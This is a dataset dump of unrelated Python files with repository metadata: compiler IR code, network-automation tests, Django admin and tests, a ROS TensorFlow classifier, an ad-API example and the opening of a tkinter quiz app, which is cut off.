            existing_func = context.module[self.value]
            if not isinstance(existing_func, ir.Function):
                raise Exception('Function/Global name collision', self.value)
            if not existing_func.is_declaration():
                raise Exception('Redifinition of {0}'.format(self.value))
            if len(existing_func.function_type.args) != len(ty.args):
                raise Exception(
                    'Redifinition with different number of arguments')
            func = context.module.globals[self.value]
        else:
            # Otherwise create a new function
            func = ir.Function(context.module, ty, self.value)
        return func

    def Evaluate(self, parent):
        args, body = self.children
        # Child context: fresh symbol-table scope for the function body.
        context = parent.new()
        func = self._create(context)
        block = func.append_basic_block('entry')
        context.builder = ir.IRBuilder(block)
        for i, arg in enumerate(func.args):
            # Spill each argument to a stack slot so it can be reassigned.
            arg.name = args[i]
            addr = context.declare(arg.name)
            context.builder.store(arg, addr)
            context.st.set(arg.name, addr)
        # check=True lets the body record whether it ends in a Return.
        body.Evaluate(context, True)
        if not context.local.__contains__("ret"):
            # Implicit `return 0` when the body has no trailing return.
            context.builder.ret(ir.Constant(ir.IntType(32), 0))
        return func
class FuncCall(Node):
    """Function-call expression: ``value`` names the callee and the children
    are the argument expressions."""

    def Evaluate(self, context):
        func = context.module.get_global(self.value)
        if func is None or not isinstance(func, ir.Function):
            raise Exception('Call to unknown function', self.value)
        if len(func.args) != len(self.children):
            raise Exception('Call argument length mismatch', self.value)
        lowered = [argument.Evaluate(context) for argument in self.children]
        return context.builder.call(func, lowered, 'calltmp')
class Return(Node):
    """Return statement; with no child expression it emits ``ret void``."""

    def Evaluate(self, context):
        if not self.children:
            return context.builder.ret_void()
        return context.builder.ret(self.children[0].Evaluate(context))
| 30.003774 | 127 | 0.599673 | 973 | 7,951 | 4.840699 | 0.169579 | 0.013588 | 0.059448 | 0.074735 | 0.392994 | 0.303822 | 0.244586 | 0.213163 | 0.171975 | 0.140552 | 0 | 0.010604 | 0.264621 | 7,951 | 264 | 128 | 30.117424 | 0.794938 | 0.011319 | 0 | 0.169399 | 0 | 0 | 0.045837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125683 | false | 0.010929 | 0.027322 | 0.021858 | 0.338798 | 0.027322 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a41dfe04ba1695c5ba79a312ffef30febd8cc6 | 2,617 | py | Python | tests/test_gnmi.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 5 | 2021-01-22T09:34:55.000Z | 2021-12-22T08:12:34.000Z | tests/test_gnmi.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 2 | 2022-01-27T14:46:40.000Z | 2022-02-28T16:59:01.000Z | tests/test_gnmi.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 1 | 2021-01-10T04:37:08.000Z | 2021-01-10T04:37:08.000Z | """
At the moment this does not tests apat from testing import of PyGNMI library and gNMI
connecton and task plugins.
Was not able to find always-on endpoints that can test using gNMI, Cisco sandboxes has gRPC
API available but that is different.
"""
import sys
import pprint
import logging
import yaml
import pytest
import socket
sys.path.insert(0, "..")
try:
from nornir import InitNornir
from nornir.core.plugins.inventory import InventoryPluginRegister
from nornir.core.plugins.connections import ConnectionPluginRegister
from nornir.core.task import Result
HAS_NORNIR = True
except ImportError:
HAS_NORNIR = False
from nornir_salt import (
ResultSerializer, DictInventory, nr_test,
DataProcessor, netmiko_send_commands,
PyGNMIPlugin, pygnmi_call
)
logging.basicConfig(level=logging.ERROR)

# Register the inventory and connection plugins under the names referenced
# by the test inventory data below.
InventoryPluginRegister.register("DictInventory", DictInventory)
ConnectionPluginRegister.register("pygnmi", PyGNMIPlugin)

# Skip marker applied to tests when the Nornir imports above failed.
# (Idiom fix: `not HAS_NORNIR` instead of `HAS_NORNIR == False`.)
skip_if_no_nornir = pytest.mark.skipif(
    not HAS_NORNIR,
    reason="Failed to import all required Nornir modules and plugins",
)
# ---------------------------------------------------
# cisco always on ios xr lab details
# ---------------------------------------------------
cisco_iosxr_always_on_router = """
hosts:
sandbox-iosxr-1.cisco.com:
hostname: "sandbox-iosxr-1.cisco.com"
platform: iosxr
username: admin
password: C1sco12345
port: 57777
connection_options:
pygnmi:
extras:
insecure: True
"""
# Probe TCP reachability of the Cisco always-on sandbox so the gNMI tests
# can be skipped when there is no network path to it.
# Fixes: bare `except:` (also swallowed KeyboardInterrupt/SystemExit) and a
# leaked socket (never closed).
s = socket.socket()
try:
    s.settimeout(1)
    s.connect(("sandbox-iosxr-1.cisco.com", 22))
    has_connection_to_cisco_iosxr_always_on_router = True
except OSError:
    # Covers DNS failure, timeout and connection refusal.
    has_connection_to_cisco_iosxr_always_on_router = False
finally:
    s.close()

skip_if_has_no_cisco_iosxr_always_on_router = pytest.mark.skipif(
    not has_connection_to_cisco_iosxr_always_on_router,
    reason="Has no connection to sandbox-iosxr-1.cisco.com router",
)
cisco_iosxr_always_on_router_dict = yaml.safe_load(cisco_iosxr_always_on_router)
def init(opts):
    """Build a Nornir runner from a dictionary-based inventory.

    :param opts: dict with a mandatory "hosts" key and optional
        "groups"/"defaults" keys
    :return: initialised Nornir object using the serial runner
    """
    inventory_options = {
        "hosts": opts["hosts"],
        "groups": opts.get("groups", {}),
        "defaults": opts.get("defaults", {}),
    }
    return InitNornir(
        logging={"enabled": False},
        runner={"plugin": "serial"},
        inventory={
            "plugin": "DictInventory",
            "options": inventory_options,
        },
    )
nr = init(cisco_iosxr_always_on_router_dict)
@skip_if_no_nornir
def test_gnmi_capabilities_check():
    # Placeholder: per the module docstring, no always-on gNMI endpoint was
    # available to test against, so this currently performs no checks.
    pass
# test_gnmi_capabilities_check()
| 25.910891 | 91 | 0.680168 | 313 | 2,617 | 5.466454 | 0.41853 | 0.046756 | 0.07481 | 0.084161 | 0.19813 | 0.106955 | 0.074226 | 0.074226 | 0.051432 | 0 | 0 | 0.008996 | 0.192969 | 2,617 | 100 | 92 | 26.17 | 0.801136 | 0.173481 | 0 | 0.028571 | 0 | 0 | 0.22321 | 0.048198 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0.028571 | 0.185714 | 0 | 0.228571 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a614b41c6ed87485f48e036058ce573a7b945d | 690 | py | Python | src/tests/benchmarks/tools/bench/AnTuTu6.py | VirtualVFix/AndroidTestFramework | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | [
"MIT"
] | null | null | null | src/tests/benchmarks/tools/bench/AnTuTu6.py | VirtualVFix/AndroidTestFramework | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | [
"MIT"
] | null | null | null | src/tests/benchmarks/tools/bench/AnTuTu6.py | VirtualVFix/AndroidTestFramework | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | [
"MIT"
] | null | null | null | # All rights reserved by forest fairy.
# You cannot modify or share anything without sacrifice.
# If you don't agree, keep calm and don't look at code bellow!
__author__ = "VirtualV <https://github.com/virtualvfix>"
__date__ = "$Apr 12, 2014 4:40:25 PM$"
import ast
from tests.benchmarks.tools.base import App
class AnTuTu6(App):
    """Benchmark wrapper for AnTuTu version 6."""

    def __init__(self, attributes, serial):
        # All setup is delegated to the generic benchmark App base class.
        App.__init__(self, attributes, serial)

    def collect_results(self, res_doc):
        """Parse raw results and record each (name, value) pair in res_doc."""
        parsed = ast.literal_eval(self.getResults())
        for bench_name, bench_value in parsed:
            # Strip the square brackets used in the raw result names.
            cleaned_name = bench_name.replace('[', '').replace(']', '')
            res_doc.add_name(cleaned_name)
            res_doc.add_result(bench_value)
| 31.363636 | 66 | 0.665217 | 97 | 690 | 4.474227 | 0.731959 | 0.041475 | 0.082949 | 0.110599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023853 | 0.210145 | 690 | 21 | 67 | 32.857143 | 0.772477 | 0.236232 | 0 | 0 | 0 | 0 | 0.131274 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a6d2898476c90a1f687ee05cacf8a8f146ec52 | 1,496 | py | Python | osc_bge/users/admin.py | jisuhan3201/osc-bge | 125c441d23d7f1fdb2d9b8f42f859082e757e25a | [
"MIT"
] | null | null | null | osc_bge/users/admin.py | jisuhan3201/osc-bge | 125c441d23d7f1fdb2d9b8f42f859082e757e25a | [
"MIT"
] | 5 | 2020-06-05T19:49:47.000Z | 2021-09-08T00:50:55.000Z | osc_bge/users/admin.py | jisuhan3201/osc-bge | 125c441d23d7f1fdb2d9b8f42f859082e757e25a | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth import get_user_model
from osc_bge.users.forms import UserChangeForm, UserCreationForm
from . import models
User = get_user_model()
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
    # Admin for the project's custom user model: reuse Django's stock
    # UserAdmin but plug in the project forms and expose the extra
    # "image" and "type" fields.
    form = UserChangeForm
    add_form = UserCreationForm
    # Prepend a fieldset for the custom fields ahead of the defaults.
    fieldsets = (("User", {"fields": ("username", "image", "type")}),) + auth_admin.UserAdmin.fieldsets
    list_display = ["username", "is_superuser", "type", "image"]
    search_fields = ["username"]
@admin.register(models.BgeAdminUser)
class BgeAdminUserAdmin(admin.ModelAdmin):
    # BGE head-office admin users, listed with their assigned partition.
    list_display = (
        "user",
        "partition",
    )
@admin.register(models.BgeBranchAdminUser)
class BgeBranchAdminUserAdmin(admin.ModelAdmin):
    # Branch-level admin users, listed with their branch.
    list_display = (
        "user",
        "branch",
    )
@admin.register(models.BgeBranchCoordinator)
class BgeBranchCoordinatorAdmin(admin.ModelAdmin):
    # Branch coordinators, listed with branch and position.
    list_display = (
        "user",
        "branch",
        "position",
    )
@admin.register(models.AgencyHeadAdminUser)
class AgencyHeadAdminUserAdmin(admin.ModelAdmin):
    # Admin users attached to an agency head office.
    list_display = (
        "user",
        "agency_head",
    )
@admin.register(models.AgencyAdminUser)
class AgencyAdminUserAdmin(admin.ModelAdmin):
    # Admin users attached to an individual agency.
    list_display = (
        "user",
        "agency",
    )
@admin.register(models.Counselor)
class CounselorAdmin(admin.ModelAdmin):
    # Counselors, listed with their agency.
    list_display = (
        "user",
        "agency",
    )
| 22 | 103 | 0.681818 | 144 | 1,496 | 6.951389 | 0.347222 | 0.090909 | 0.113886 | 0.155844 | 0.273726 | 0.243756 | 0 | 0 | 0 | 0 | 0 | 0 | 0.198529 | 1,496 | 67 | 104 | 22.328358 | 0.834862 | 0 | 0 | 0.32 | 0 | 0 | 0.093583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.46 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a79266ccd514b38d38bed6f38f0c721bb4fe9e | 3,949 | py | Python | scripts/ros_tensorflow_classify.py | xuanlvxin/blog_backup | 691c040efe4d752b4c4badbdd5dd78960ed966e2 | [
"Apache-2.0"
] | 45 | 2018-05-13T01:55:40.000Z | 2022-03-28T15:20:48.000Z | scripts/ros_tensorflow_classify.py | xuanlvxin/blog_backup | 691c040efe4d752b4c4badbdd5dd78960ed966e2 | [
"Apache-2.0"
] | 1 | 2018-06-06T10:39:02.000Z | 2018-09-05T01:52:19.000Z | scripts/ros_tensorflow_classify.py | xuanlvxin/blog_backup | 691c040efe4d752b4c4badbdd5dd78960ed966e2 | [
"Apache-2.0"
] | 17 | 2018-05-14T12:17:57.000Z | 2020-03-29T09:41:07.000Z | #!/usr/bin/env python
import rospy
from sensor_msgs.msg import Image
from std_msgs.msg import String
from cv_bridge import CvBridge
import cv2
import numpy as np
import tensorflow as tf
import os
import re
class RosTensorFlow():
    """ROS node that classifies camera frames with a TensorFlow
    Inception-style graph and publishes the top label strings.

    Subscribes to ``usb_cam/image_raw`` (sensor_msgs/Image) and publishes
    confident labels on ``/result_ripe`` (std_msgs/String).
    """

    def __init__(self):
        # One TF session reused for every incoming frame.
        self._session = tf.Session()
        self._cv_bridge = CvBridge()
        # queue_size=1: always process only the newest camera frame.
        self._sub = rospy.Subscriber('usb_cam/image_raw', Image, self.callback, queue_size=1)
        self._pub = rospy.Publisher('/result_ripe', String, queue_size=1)
        # Minimum softmax score a label must reach before being published.
        self.score_threshold = rospy.get_param('~score_threshold', 0.1)
        # Number of highest-scoring classes to consider per frame.
        self.use_top_k = rospy.get_param('~use_top_k', 5)

    def load(self, label_lookup_path, uid_lookup_path):
        """Build the mapping from integer node ID to human-readable label.

        :param label_lookup_path: proto text file mapping node IDs to UIDs
        :param uid_lookup_path: text file mapping UID strings to labels
        :return: dict {int node_id: str human-readable label}
        """
        if not tf.gfile.Exists(uid_lookup_path):
            tf.logging.fatal('File does not exist %s', uid_lookup_path)
        if not tf.gfile.Exists(label_lookup_path):
            tf.logging.fatal('File does not exist %s', label_lookup_path)
        # Loads mapping from string UID to human-readable string
        proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
        uid_to_human = {}
        p = re.compile(r'[n\d]*[ \S,]*')
        for line in proto_as_ascii_lines:
            parsed_items = p.findall(line)
            uid = parsed_items[0]
            human_string = parsed_items[2]
            uid_to_human[uid] = human_string
        # Loads mapping from string UID to integer node ID.
        node_id_to_uid = {}
        proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
        for line in proto_as_ascii:
            if line.startswith(' target_class:'):
                target_class = int(line.split(': ')[1])
            if line.startswith(' target_class_string:'):
                # [1:-2] strips the surrounding quotes and trailing newline.
                target_class_string = line.split(': ')[1]
                node_id_to_uid[target_class] = target_class_string[1:-2]
        # Loads the final mapping of integer node ID to human-readable string
        node_id_to_name = {}
        for key, val in node_id_to_uid.items():
            if val not in uid_to_human:
                tf.logging.fatal('Failed to locate: %s', val)
            name = uid_to_human[val]
            node_id_to_name[key] = name
        return node_id_to_name

    def callback(self, image_msg):
        """Classify one camera frame and publish confident labels."""
        cv_image = self._cv_bridge.imgmsg_to_cv2(image_msg, "bgr8")
        image_data = cv2.imencode('.jpg', cv_image)[1].tostring()
        # Creates graph from saved GraphDef.
        softmax_tensor = self._session.graph.get_tensor_by_name('softmax:0')
        predictions = self._session.run(
            softmax_tensor, {'DecodeJpeg/contents:0': image_data})
        predictions = np.squeeze(predictions)
        # Creates node ID --> English string lookup.
        # NOTE(review): the lookup files are re-parsed from disk on every
        # frame; consider caching the result of load() in __init__.
        # PATH_TO_LABELS / PATH_TO_UID are module globals set in __main__.
        node_lookup = self.load(PATH_TO_LABELS, PATH_TO_UID)
        # Indices of the top-k scores, highest score first.
        top_k = predictions.argsort()[-self.use_top_k:][::-1]
        for node_id in top_k:
            if node_id not in node_lookup:
                human_string = ''
            else:
                human_string = node_lookup[node_id]
            score = predictions[node_id]
            if score > self.score_threshold:
                rospy.loginfo('%s (score = %.5f)' % (human_string, score))
                self._pub.publish(human_string)

    def main(self):
        # Block until the node is shut down; callbacks run on ROS threads.
        rospy.spin()
if __name__ == '__main__':
    # Resolve model/label paths relative to the package root (one level up
    # from this script's directory).
    ROOT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
    PATH_TO_CKPT = ROOT_PATH + '/include/classifier/classify_image_graph_def.pb'
    PATH_TO_LABELS = ROOT_PATH + '/include/classifier/imagenet_2012_challenge_label_map_proto.pbtxt'
    PATH_TO_UID = ROOT_PATH + '/include/classifier/imagenet_synset_to_human_label_map.txt'
    # Load the frozen Inception graph into the default TF graph before
    # any callback can run.
    with tf.gfile.FastGFile(PATH_TO_CKPT, 'rb') as f:
        graph_def = tf.GraphDef()
        graph_def.ParseFromString(f.read())
        _ = tf.import_graph_def(graph_def, name='')
    rospy.init_node('ros_tensorflow_classify')
    tensor = RosTensorFlow()
    tensor.main()
| 37.971154 | 100 | 0.640669 | 541 | 3,949 | 4.35305 | 0.286506 | 0.033121 | 0.023779 | 0.014013 | 0.152866 | 0.101911 | 0.061147 | 0.061147 | 0.03482 | 0.03482 | 0 | 0.008144 | 0.253735 | 3,949 | 103 | 101 | 38.339806 | 0.790974 | 0.068625 | 0 | 0 | 0 | 0 | 0.117375 | 0.058279 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051948 | false | 0 | 0.12987 | 0 | 0.207792 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a7a2ca9d0dcc0caead7e8e09caea9c36c46387 | 3,075 | py | Python | python/v1/generate_default_line_item.py | googleads/googleads-displayvideo-examples | cd1b4b3bc63e068fef4ff23264232a65f70207b5 | [
"Apache-2.0"
] | 2 | 2021-10-08T12:10:38.000Z | 2022-01-23T16:00:12.000Z | python/v1/generate_default_line_item.py | googleads/googleads-displayvideo-examples | cd1b4b3bc63e068fef4ff23264232a65f70207b5 | [
"Apache-2.0"
] | 1 | 2021-04-09T16:34:06.000Z | 2021-04-12T14:42:00.000Z | python/v1/generate_default_line_item.py | googleads/googleads-displayvideo-examples | cd1b4b3bc63e068fef4ff23264232a65f70207b5 | [
"Apache-2.0"
] | 4 | 2021-05-20T17:55:54.000Z | 2022-02-10T14:13:40.000Z | #!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example generates a default line item under the given insertion order.
The line item will inherit settings, including targeting, from the insertion order. If generating a
Mobile App Install line item, an app ID must be provided.
"""
import argparse
import os
import sys
from googleapiclient.errors import HttpError
sys.path.insert(0, os.path.abspath('..'))
import samples_util
# Declare command-line flags.
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'advertiser_id', help='The ID of the parent advertiser of the line item to be created.')
argparser.add_argument(
'insertion_order_id', help='The ID of the insertion order of the line item to be created.')
argparser.add_argument(
'display_name', help='The display name of the line item to be created.')
argparser.add_argument(
'line_item_type', help='The type of the line item to be created.')
argparser.add_argument(
'--app_id',
help='The app ID of the mobile app promoted by the line item. Required and only valid if line '
'item type is either LINE_ITEM_TYPE_DISPLAY_MOBILE_APP_INSTALL or '
'LINE_ITEM_TYPE_VIDEO_MOBILE_APP_INSTALL.')
def main(service, flags):
    """Generate a default line item under the given insertion order.

    :param service: Display & Video 360 API service object
    :param flags: parsed command-line arguments (advertiser_id,
        insertion_order_id, display_name, line_item_type, app_id)
    """
    # Body of the generateDefault request, built from the CLI flags.
    request_body = {
        'insertionOrderId': flags.insertion_order_id,
        'displayName': flags.display_name,
        'lineItemType': flags.line_item_type
    }

    mobile_app_install_types = (
        'LINE_ITEM_TYPE_DISPLAY_MOBILE_APP_INSTALL',
        'LINE_ITEM_TYPE_VIDEO_MOBILE_APP_INSTALL'
    )
    # Mobile App Install line items additionally require an app ID.
    if flags.line_item_type in mobile_app_install_types:
        if not flags.app_id:
            print('Error: No app ID given for Mobile App Install line item. Exiting.')
            sys.exit(1)
        request_body['mobileApp'] = {'appId': flags.app_id}

    try:
        # Build and execute the generateDefault request.
        line_items = service.advertisers().lineItems()
        request = line_items.generateDefault(
            advertiserId=flags.advertiser_id, body=request_body)
        response = request.execute()
    except HttpError as e:
        print(e)
        sys.exit(1)

    # Display the new line item resource name.
    print(f'Line Item {response["name"]} was created.')
if __name__ == '__main__':
    # Retrieve command line arguments (argparser defined at module level).
    flags = samples_util.get_arguments(sys.argv, __doc__, parents=[argparser])
    # Authenticate and construct the DV360 v1 service.
    service = samples_util.get_service(version='v1')
    main(service, flags)
| 33.791209 | 99 | 0.744715 | 446 | 3,075 | 4.964126 | 0.363229 | 0.083108 | 0.04336 | 0.036134 | 0.242096 | 0.217706 | 0.172538 | 0.079494 | 0.079494 | 0.079494 | 0 | 0.004706 | 0.170732 | 3,075 | 90 | 100 | 34.166667 | 0.863529 | 0.355772 | 0 | 0.155556 | 0 | 0 | 0.369365 | 0.08248 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.111111 | 0 | 0.133333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a92c8d5a10768f359c0ce9e4aa075658259077 | 3,897 | py | Python | datacombine/tests/test_models.py | Crimson-Star-Software/data-combine | 3209ae2316afc38417e51c3261494d6e7d2e4e2a | [
"MIT"
] | null | null | null | datacombine/tests/test_models.py | Crimson-Star-Software/data-combine | 3209ae2316afc38417e51c3261494d6e7d2e4e2a | [
"MIT"
] | 3 | 2020-02-11T23:14:53.000Z | 2021-06-10T18:32:57.000Z | datacombine/tests/test_models.py | Crimson-Star-Software/data-combine | 3209ae2316afc38417e51c3261494d6e7d2e4e2a | [
"MIT"
] | null | null | null | from django.test import TestCase
from datacombine import models as dcmodels
from collections import namedtuple
from django.core.exceptions import FieldError
import re
Match = namedtuple("Match", ["object", "regex", "match"])
class PhoneTestCase(TestCase):
    """Tests for the dcmodels.Phone model: __str__ rendering and the
    create_from_str parser."""

    def setUp(self):
        # Fixtures covering each field combination: with/without area
        # code and with/without extension.
        dcmodels.Phone.objects.create(area_code="407", number="5559999")
        dcmodels.Phone.objects.create(number="1234567")
        dcmodels.Phone.objects.create(number="3141592", extension="48")
        dcmodels.Phone.objects.create(
            area_code="904", number="3141592", extension="2"
        )

    def test_str(self):
        # str(Phone) should match "(AAA)-" (if area code) + "NNN-NNNN"
        # + " x EXT" (if extension); build the expected regex per record.
        all_phone_nums = dcmodels.Phone.objects.all()
        matches = []
        for num in all_phone_nums:
            regex_str = ""
            if getattr(num, 'area_code', None):
                regex_str += "\([0-9]{3}\)\-"
            regex_str += "[0-9]{3}\-[0-9]{4}"
            if getattr(num, "extension", None):
                regex_str += " x [0-9]+"
            match = True if re.match(regex_str, str(num)) else False
            matches.append(Match(num, regex_str, match))
        ms = all([m.match for m in matches])
        if not ms:
            # Print the offending record(s) before failing, for debugging.
            for m in matches:
                if not m.match:
                    print(f"Failure on {m.object} with {m.regex}")
        self.assertTrue(ms)

    def test_phone_create_from_str_1_block_7_digit(self):
        ph = dcmodels.Phone()
        ph.create_from_str("1234567")
        self.assertEqual(ph.number, "1234567")

    def test_phone_create_from_str_2_block_7_digit(self):
        ph = dcmodels.Phone()
        ph.create_from_str("123-4567")
        self.assertEqual(ph.number, "1234567")

    def test_phone_create_from_str_2_block_bad_7_digit(self):
        # Parser should tolerate a misplaced dash.
        ph = dcmodels.Phone()
        ph.create_from_str("12-34567")
        self.assertEqual(ph.number, "1234567")

    def test_phone_create_from_str_3_block_bad_7_digit(self):
        # Parser should tolerate stray parentheses/dashes.
        ph = dcmodels.Phone()
        ph.create_from_str("(123)-45-67")
        self.assertEqual(ph.number, "1234567")

    def test_phone_create_from_average_str(self):
        ph = dcmodels.Phone()
        ph.create_from_str("(407)-666-9999")
        self.assertTrue(ph.area_code == "407" and ph.number == "6669999")

    def test_phone_create_from_average_str_with_ext(self):
        ph = dcmodels.Phone()
        ph.create_from_str("(407)-666-9999 x 49")
        self.assertTrue(ph.area_code == "407" and ph.number == "6669999"\
                        and ph.extension == "49")

    def test_phone_create_from_str_too_few_numbers(self):
        # Too few digits is rejected with a FieldError.
        ph = dcmodels.Phone()
        with self.assertRaises(FieldError):
            ph.create_from_str("1")

    def test_phone_create_from_str_null(self):
        # Empty input leaves every field as None.
        ph = dcmodels.Phone()
        ph.create_from_str("")
        self.assertTrue(ph.area_code == ph.number == ph.extension == None)

    def test_null_phone_is_none(self):
        # An all-None Phone compares equal to None (relies on Phone.__eq__).
        ph = dcmodels.Phone()
        ph.create_from_str("")
        self.assertTrue(ph == None)

    def tearDown(self):
        dcmodels.Phone.objects.all().delete()
class ContactTestCase(TestCase):
    """Tests for contact-related models: phone fixtures plus one
    EmailAddress record."""

    def setUp(self):
        # Phone fixtures covering each field combination.
        dcmodels.Phone.objects.create(area_code="407", number="5559999")
        dcmodels.Phone.objects.create(number="1234567")
        dcmodels.Phone.objects.create(number="3141592", extension="48")
        dcmodels.Phone.objects.create(
            area_code="904", number="3141592", extension="2"
        )
        # Single email-address fixture using the module's status constants.
        dcmodels.EmailAddress.objects.create(
            confirm_status=dcmodels.NO_CONFIRMATION_REQUIRED,
            email_address='pastor@stnerp.org',
            cc_id='a09d1c20-6aac-11e3-8c26-982bcb740129',
            opt_in_date='2011-06-27T18:47:16.000Z',
            opt_in_source=dcmodels.ACTION_BY_OWNER,
            status=dcmodels.ACTIVE
        )

    def test_get_email_addresses(self):
        # Exactly the one fixture email address should exist.
        self.assertTrue(len(dcmodels.EmailAddress.objects.all()) == 1)
| 36.083333 | 74 | 0.628689 | 501 | 3,897 | 4.664671 | 0.255489 | 0.105691 | 0.08344 | 0.073171 | 0.560548 | 0.547711 | 0.500214 | 0.482242 | 0.482242 | 0.482242 | 0 | 0.079037 | 0.243521 | 3,897 | 107 | 75 | 36.420561 | 0.713704 | 0 | 0 | 0.303371 | 0 | 0 | 0.098794 | 0.015396 | 0 | 0 | 0 | 0 | 0.123596 | 1 | 0.157303 | false | 0 | 0.05618 | 0 | 0.235955 | 0.011236 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a9a2d818ad02b61cfd18575ed9cdd4ecccdb57 | 36,453 | py | Python | Capture the Flag/FirstRound.py | yokesh-git/Quiz-Application | 2b990ee9f711d05956e76ade0550bfa1abd86b08 | [
"MIT"
] | null | null | null | Capture the Flag/FirstRound.py | yokesh-git/Quiz-Application | 2b990ee9f711d05956e76ade0550bfa1abd86b08 | [
"MIT"
] | null | null | null | Capture the Flag/FirstRound.py | yokesh-git/Quiz-Application | 2b990ee9f711d05956e76ade0550bfa1abd86b08 | [
"MIT"
] | null | null | null | from tkinter import *
from firebase import firebase
from PIL import Image, ImageTk
fbconn = firebase.FirebaseApplication('https://samplefbtest-266bd.firebaseio.com/',None)
# Running tally of correct answers across all quiz screens.
# (Fix: removed the preceding `global crtans` — a `global` statement at
# module scope is a no-op; assignment at module level already creates the
# module attribute.)
crtans = 0
class FirstRound:
print("Done")
def __init__(self, master):
global w,h,ws,hs,x,y
w = 1000
h = 650
ws = root.winfo_screenwidth() # width of the screen
hs = root.winfo_screenheight() # height of the screen
x = (ws/4) - (w/4)
y = (hs/4) - (h/4)
global answer1,answer2,anslist
anslist = []
answer1 = '2'
answer2 = '1'
answer3 = '2'
answer4 = '2'
answer5 = '1'
answer6 = '2'
answer7 = '3'
answer8 = '4'
answer9 = '3'
answer10 = '3'
answer11 = '1'
answer12 = '2'
answer13 = '3'
answer14 = '3'
answer15 = '3'
answer16 = '4'
answer17 = '2'
answer18 = '4'
answer19 = '3'
answer20 = '3'
self.master=master
master.title('First Round')
self.frame = Frame(master,width=1000, height=600, bg='black')
self.frame.pack()
self.heading = Label(self.frame, text="Kalasalingam Institute of Technology", font=('arial 30 bold'), fg='black', bg='lightgreen')
self.heading.place(x=180, y=20)
self.title = Label(self.frame, text="Cybertron'20", font=('arial 30 bold'), fg='black', bg='lightgreen')
self.title.place(x=350, y=100)
self.name = Label(self.frame, text="Name :", font=('arial 13'), fg='black', bg='lightgreen')
self.name.place(x=300, y=200)
self.nameentry = Entry(self.frame,width=50)
self.nameentry.place(x=400,y=200)
self.clg = Label(self.frame, text="College :", font=('arial 13'), fg='black', bg='lightgreen')
self.clg.place(x=300, y=250)
self.clgentry = Entry(self.frame,width=50)
self.clgentry.place(x=400,y=250)
self.mail = Label(self.frame, text="Mail :", font=('arial 13'), fg='black', bg='lightgreen')
self.mail.place(x=300, y=300)
self.mailentry = Entry(self.frame,width=50)
self.mailentry.place(x=400,y=300)
self.start = Button(self.frame,width=10,text="Start",command = self.start)
self.start.place(x=380,y=350)
